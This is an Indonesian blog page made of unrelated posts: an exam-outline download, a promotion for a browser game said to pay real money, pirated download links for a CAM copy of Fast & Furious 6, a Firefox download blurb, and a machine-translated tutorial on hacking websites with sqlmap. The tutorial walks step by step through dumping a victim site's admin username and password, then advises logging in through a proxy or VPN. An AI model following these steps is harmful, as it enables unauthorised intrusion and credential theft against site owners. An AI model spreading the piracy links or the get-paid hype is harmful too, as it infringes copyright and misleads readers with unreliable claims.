KISI KISI UN pembelajaran TAHUN 2014-205

 KISI KISI UN pembelajaran TAHUN 2014-205. kali ini saya akan mengberikan kisi kisi UN pembelajaran tahun 2014-2015. Informasi ini saya dapat kan dari web bsnp-indonesia
maka langsung aja kalian lihat kisi kisi ersebu siapa au bermanfaat bagi kalian




bagi kalian yang mau downlod kisi kisi UN pembelajaran TAHUN 2014-2015 silakan klik disini

GAME PENGHASIL UANG NYATA (NO HOAX, NO SCAM, FREE)

MarketGlory adalah sebuah web browser game - mengangkat setting kehidupan virtual masa sekarang. Game ini lebih condong ke simulasi bisnis antar negara - di mana pemain bisa memilih untuk bekerja di perusahaan milik pemain lain dan mendapatkan bayaran (gaji) atau membangun usahanya sendiri - pabrik dengan berbagai macam barang produksi mulai dari makanan, senjata, pakaian dan lain lain - untuk kemudian menjual hasil produksi tersebut kepada pemain lain senegara atau eksport ke negara lain.
Market Glory sebuah game MMORPG, simulasi strategi bisnis di mana agan agan sekalian bisa mengambil peran sebagai warga biasa alias pekerja, pengusaha, gladiator arena, tentara dan juga politisi untuk bekerja sama memajukan negara Indonesia.
marketglory adalah sebuah game online yang mirip dengan Anno1777 - pemain bisa mengubah profit yang mereka dapatkan dalam permainan menjadi sebuah profit yang bernilai uang sesungguhnya - mata uang digital yang berlaku di dalam game diubah menjadi mata uang EURO - yang bisa anda tarik ke dalam rekening bank lokal (wire transfer) atau ke dalam account paypai anda.
Anda tertarik memainkan game ini? Yang dibutuhkan hanya web browser seperti Internet Explorer, Mozilla Firefox atau Google Chrome, seperangkat PC (desktop, notebook/netbook) dan akses Internet. Untuk mendaftarkan diri tidak dipungut biaya alias GRATIS - anda bisa memulai tanpa menggunakan modal uang samasekali.

Satu hal yang menarik dari game ini, profit virtual yang di dapat -- bisa dikonversikan menjadi UANG BENERAN yang bisa ditarik (withdraw) ke rekening bank (wire transfer) atau rekening paypai. Tapi sebelumnya mohon di catat - Ini bukan game dengan skema iklan Hype 'cepat kaya' dan sejenisnya - untuk bisa mendapatkan uang beneran membutuhkan proses - Marketlory adalah sebuah game dan uang yang bisa di dapat adalah reward dari bermain game itu sendiri - tergantung dari taktik dan skill bisnis yang agan miliki

yang menarik dari MarketGlory:
1.Mendaftar Gratis
2.Tidak perlu membayar, beli voucher game atau melakukan deposito investasi
3.Ada dua perusahaan yang bisa di buka gratis, perusahaan koran dan 4.perusahaan susu sapi perah
5.Ada In game Chat Room untuk berdiskusi antar sesama pemain
6.Tidak perlu waktu lama nongkrong di depan layar - MarketGlory bukan game 7.yang menghabiskan waktu sia sia
8.Profit Virtual bisa dikonversikan menjadi uang sesungguhnya (EURO)
9.Ada bonus referal bulanan dalam bentuk Euro jika agan mengajak orang lain
10.Bisa bikin organisasi perang - menyerang negara lain dan mengambil rampasan perang berupa Euro, Gold dan Mata Uang negara sasaran. *lirik negara tetangga malaysia*

agan disini cuma tinggal klik klik aja, tp tidak asal klik disini diutamakan strategy agan supaya tidak salah langkah kedepannya, strategy yang bagus akan menghasilkan pendapatan bagus pula,
TAPI TENANG AGAN GA USAH PANIK, DISANA SUDAH BANYAK PARA MASTER2 YANG SIAP MEMBIMBING AGAN AGAN, AGAN TINGGALCHAT AJA DI ROOM INDONESIA

kalo ane sndri sih gan di bawa santai aja main nya, itung2 belajar bisnis kaya di di dunia nyata,

kita bisa menghasilkan uang dari:
1. fight
2. work
3. membuat perusahaan
4. arena
5. war antar negara

apabila ke 5 poin diatas sudah terlaksanakan anda tinggal menikmati uang nya aja gan, ingat ini bisa di konversikan ke UANG NYATA, sekali lagi UANG nyata.

cara mengambil uang nya, agan klik withdraw di pojok kanan atas, lalu isikan data datanya termasuk email paypai agan, stlah itu cek paypai agan, apabila sudah ada di paypai baru deh di trans ke rek bank agan, lmyan simpel kan gan.


Ini Buktinya Mastah2
http://1.bp.blogspot.com/-Y9PA7Cq07Z8/UZ4jSmXQ17I/AAAAAAAAADE/B-UHgIr7AIU/s1600/prof3.jpg
https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-prn1/553346_4210751188817_1742867157_n.jpg

Untuk Anda yang baru saja bermain saya menyarankan untuk Mastah-Mastah Semuanya [spoiler][quote]memulai dengan bertarung di "fight ->-> Refferal Fight". Untuk mulai menghasilkan uang, setelah itu bekerja di "Work ->-> Workplaces" ini untuk menghasilkan uang dan Experience. Anda bisa bertarung di Referral Fight melawan trainer sebanyak 10 (sepuluh) kali dalam sehari dengan delay 10 menit untuk setiap kali bertarung. Sedangkan Anda hanya bisa bekerja satu kali sehari.

Pada hari kedua Anda bisa mulai membeli Articles / Koran untuk meningkatkan energi Anda dengan uang pada hari sebelumnya. Gunanya menambah energi adalah Anda bisa lebih banyak mendapatkan bonus bertarung pada saat bertarung di Referral Fight, jadi pemasukan Anda akan bertambah dari hari sebelumnya. Article/Koran bisa dibeli pada halaman "HOME" dan akan meningkatkan 0.3 poin energi Anda ( jika pada halaman "HOME" tidak terdapat artikel sampai dengan 10 (sepuluh) Anda bisa mengklik pada tab "Top Articles" untuk mencari artikel-artikel yang dijual pada hari-hari sebelumnya).


Setelah anda membeli Articles sesuai dengan kemampuan keuangan Anda, Bertarunglah hingga 10 Kali jatah bertarung harian anda habis setelah itu baru Anda bekerja, ini dikarenakan jika kita perhitungkan keuntungan anda melakukan pertarungan di Referral Fight dengan keuntungan jika Anda bekerja lebih menguntungkan untuk bertarung, karena dengan bertarung anda hanya akan menghabiskan 10% Energi, Sedangkan bekerja menghabiskan 50% Energi. Disamping itu dengan bertarung Anda juga mendapat bonus memenangkan pertarungan, dan bonus memenangkan pertarungan akan diperhitungkan sesuai dengan jumlah energi Anda, sedangkan bekerja hanya diperhitungkan jumlah produktivitas Anda saja dan bonus bekerja diperhitungkan setiap 3 hari sekali dengan perhitungan pun sesuai dengan jumlah Produktivitas Anda.


Saya sangat menyarankan waktu saat anda bekerja disesuaikan dengan waktu Anda Online. Sehingga anda tidak akan bolos bekerja dan kehilangan bonus bekerja begitupun experience Anda tidak akan berkurang drastis. ini dikarenakan experience akan berkurang terus setiap hari, sedangkan anda hanya mendapatkan 0,7 Experience setiap anda bekerja.


Setiap hari anda akan makin berkembang di dalam Market Glory, sebuah perjuangan dengan taktik yang tepat tentunya. Kesabaran, Kesetiakawanan, Loyalitas, Patriotisme, dan Managemen Keuangan anda akan diuji didalam game ini. Sebuah game yang perlu anda coba! dengan kemungkinan mendapatkan uang nyata! dari jerih payah Anda tentunya
 Daftar Disini

Fast & Furious 6 (2013) CAM





 Fast & Furious 6 (2013) CAM,bulan kemarn baru liris  film kesayangan kita semua yaitu Fast & Furious 6 (2013) CAM
oke langsung saja kalian downlod film nya


 Download Fast & Furious 6 (2013) CAM 500MB Ganool
 Info: http://www.imdb.com/title/tt1905041/
Release Date: 24 May 2013 (USA)
Genre: Action | Crime | Thriller
Stars : Dwayne Johnson, Vin Diesel, Paul Walker
Quality: CAM
Encoder: SHQ@Ganool
Source: 720p CAM-TheCod3r
Size: 500MB
Subtitle: Indonesia, English
Synopsis:
 

Akafile: Full Speed
http://adf.ly/PDulN
http://adf.ly/PDulO
http://adf.ly/PDulP

Mightyupload: Full Speed
http://adf.ly/PDu0i
http://adf.ly/PDu0j
http://adf.ly/PDu0k

Putlocker: Full Speed
http://adf.ly/PDu0l
http://adf.ly/PDu0m
http://adf.ly/PDu0n

UpToBox: Full Speed
http://adf.ly/PDu5l
http://adf.ly/PDu5m
http://adf.ly/PDu5n

Uploadscenter:Full Speed
http://adf.ly/PDu5h
http://adf.ly/PDu5i
http://adf.ly/PDu5j

Megafiles.se: Full Speed
http://adf.ly/PSwlc
http://adf.ly/PSwld
http://adf.ly/PSwle

Netload:
http://adf.ly/PDu5a
http://adf.ly/PDu5b
http://adf.ly/PDu5c

Turbobit:
http://adf.ly/PDulS
http://adf.ly/PDulT
http://adf.ly/PDulU

Uploaded.To:
http://adf.ly/PDu5d
http://adf.ly/PDu5e
http://adf.ly/PDu5f

Hack website using backtrack sqlmap

Hack website using backtrack sqlmap, tutorial ini saya akan menunjukkan kepada Anda cara hack website menggunakan Backtrack 5 (sqlmap). Sqlmap adalah sql injection otomatis alat yang membantu Anda untuk hack situs dengan mudah. Ikuti langkah-langkah sederhana untuk hack website menggunakan backtrack 5 alat sqlmap.

1. Buka terminal mundur dan jenis cd / pentest / database / sqlmap dan tekan enter. Sekarang sqlmap terbuka di terminal Anda sql map 1
2. Sekarang menemukan situs rentan. (Baik saya sudah memiliki situs rentan)
sql map 2
3. Sekarang ketik perintah ini di terminal dan tekan enter. (Lihat di atas gambar)

python sqlmap.py-u http://yourvictim 'menyelinap / index.php id =? 4 -dbs

4. Sekarang Anda akan mendapatkan nama database website
sql map 3
Yah aku punya dua database aj dan information_schema kita akan memilih database aj.

5. Sekarang mendapatkan tabel database tersebut. untuk itu Anda perlu memasukkan perintah ini ke terminal Anda dan hanya tekan Enter.
python sqlmap.py-u slink / index.php http://yourvictim '? id = 4 -D (nama database)-tabel

6. Sekarang kita perlu untuk mengambil tabel dari database aj. paste perintah bawah perintah dan tekan enter.
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id =? 4 -D aj-tabel
sql map 4
7. Sekarang Anda akan mendapatkan daftar tabel yang disimpan dalam database aj.
sql map 5
8. Sekarang mari kita ambil kolom dari tabel admin
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id = 4? -T admin - kolom
sql map 7
Sekarang kita punya kolom dan kami mendapat username dan password
9. Sekarang mari kita ambil password admin
python sqlmap.py-u ? slink.com / index.php http://www.yourvictim 'id = 4 -T admin-U test - dump
Sekarang kita punya username dan password dari website!
sql map 9
Sekarang hanya menemukan admin pidana website dan menggunakan proxy / vpn ketika Anda mencoba untuk login di website sebagai admin.

Download Mozilla Firefox 20.0.1

Mozilla FirefoxDownload Mozilla Firefox 20.0.1 Final Terbaru. Mozilla Firefox versi 21 Updates New Version. Mozilla Firefox 20.0 Final full version. Kini Mozilla Firefox telah diperbarui ke versi Mozilla Firefox 20.0.1 Final yang dapat di download secara gratis. Pada versi ini terdapat beberapa perbaikan masalah Windows yang hanya update untuk menangani isu-isu seputar penanganan path UNC.
untuk lebih jelasnya silahkan kunjungi web resmi www.mozilla.org,
Features:

Anti-Malware
Firefox protects you from viruses, worms, trojan horses and spyware delivered over the Web. If you accidentally access an attack site, it will warn you away from the site and tell you why it isn’t safe to use.

Anti-Phishing
Shop and do business safely on the Internet. Firefox gets a fresh update of web forgery sites 48 times in a day, so if you try to visit a fraudulent site that’s pretending to be a site you trust (like your bank), a browser message—big as life—will stop you.

Instant Web Site ID
Want to be extra sure about a site’s legitimacy before you make a purchase? Click on a site favicon for an instant identity overview. Another click digs deeper: how many times have you visited? Are your passwords saved? Check up on suspicious sites, avoid Web forgeries and make sure a site is what it claims to be.

Forget This Site
Having second thoughts about having visited a certain Web site? With this feature, you can remove every trace of that site from your browser—no questions asked!

Parental Controls
Enforce parental control settings you’ve entered on Windows 7 — stop unwanted downloads and more.

Outdated Plug-In Detection
Some web pages require that you install small applications called plugins to watch videos, play games or view documents. These plugins are written by other companies, and it can be hard to make sure they’re always up to date. Since outdated plugins are a security risk, Firefox will let you know when you have a plugin that’s vulnerable to attack and direct you to the right site to get the updated version. View our plugin check page.

Clear Recent History
Clear all your private data or just your activity over the past few hours with a few quick clicks. You have full control over what to delete, and then your info is gone for good—on your own computer or the one at your local library. It’s that easy.

Private Browsing
Sometimes it’s nice to go undercover, so turn this feature on and protect your browsing history. You can slip in and out of private browsing mode quickly, so it’s easy to go back to what you were doing before as if nothing ever happened. It’s great if you’re doing your online banking on a shared computer or checking email from an Internet cafĂ©.

Customized Security Settings
Control the level of scrutiny you’d like Firefox to give a site and enter exceptions—sites that don’t need the third degree. Customize settings for passwords, cookies, loading images and installing add-ons for a fully empowered Web experience.

Add-ons
Firefox looks for a secure connection before installing or updating add-ons, 3rd party software, and Personas.

Anti-Virus Software
Firefox integrates elegantly with your Windows antivirus software. When you download a file, your computer’s antivirus program automatically checks it to protect you against viruses and other malware, which could otherwise attack your computer.

Platform
Windows 8 compatible, Windows Vista 64-bit, Windows 7, Windows 7 64-bit, Windows Vista, Windows XP





Judul:
Mozilla Firefox 20.0.1 Final
Nama file:
Firefox Setup 20.0.1.exe
File size:
20.06 MB
OS:
Windows XP / Vista / Windows7 / XP64 / Vista64 / Windows7 64 / Windows8 / Windows8 64
Bahasa:
Multiple languages
Lisensi:
Author:
Open Source
Organisasi Mozilla (www.mozilla.org)
 
 
silahkan di download sob :)

Pengikut